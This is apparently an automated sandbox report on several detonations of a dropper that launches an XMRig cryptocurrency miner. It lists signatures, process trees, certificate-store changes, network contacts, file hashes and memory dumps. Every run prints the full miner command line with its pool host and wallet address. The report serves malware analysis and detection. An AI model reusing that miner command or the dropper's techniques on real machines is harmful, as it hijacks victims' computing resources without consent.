| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5300 wrote to memory of 972 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 5300 wrote to memory of 972 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1324 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3104 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| GB | 142.250.187.202:443 | | tcp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.246.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral10
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1712 wrote to memory of 3116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1712 wrote to memory of 3116 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.57:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.79.70.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3836 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3836 wrote to memory of 2392 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| NL | 23.62.61.57:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.61.62.23.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2392-16-0x000002267E810000-0x000002267E830000-memory.dmp
memory/2392-17-0x000002267E860000-0x000002267E880000-memory.dmp
memory/2392-18-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-19-0x000002267E8A0000-0x000002267E8C0000-memory.dmp
memory/2392-20-0x000002267E880000-0x000002267E8A0000-memory.dmp
memory/2392-21-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-22-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-23-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-24-0x000002267E8A0000-0x000002267E8C0000-memory.dmp
memory/2392-25-0x000002267E880000-0x000002267E8A0000-memory.dmp
memory/2392-26-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-27-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-28-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-29-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-30-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-31-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-32-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-33-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-34-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-35-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-36-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-37-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-38-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-39-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-40-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-41-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-42-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-43-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-44-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-45-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-46-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-47-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-48-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-49-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-50-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-51-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-52-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-53-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-54-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-55-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-56-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-57-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-58-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-59-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-60-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-61-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-62-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-63-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-64-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-65-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-66-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-67-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-68-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-69-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-70-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-71-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-72-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-73-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-74-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-75-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-76-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-77-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-78-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-79-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-80-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-81-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-82-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-83-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
memory/2392-84-0x00007FF784BD0000-0x00007FF7856D3000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56
bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2100 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2100 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (7).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2108-16-0x000001D3F8710000-0x000001D3F8730000-memory.dmp
memory/2108-17-0x000001D3F9F00000-0x000001D3F9F20000-memory.dmp
memory/2108-18-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-19-0x000001D3F9F20000-0x000001D3F9F40000-memory.dmp
memory/2108-20-0x000001D3F9F40000-0x000001D3F9F60000-memory.dmp
memory/2108-21-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-22-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-23-0x000001D3F9F20000-0x000001D3F9F40000-memory.dmp
memory/2108-25-0x000001D3F9F40000-0x000001D3F9F60000-memory.dmp
memory/2108-24-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-26-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-27-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-28-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-29-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-30-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-31-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-32-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-33-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-34-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-35-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-36-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-37-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-38-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-39-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
memory/2108-40-0x00007FF6932C0000-0x00007FF693DC3000-memory.dmp
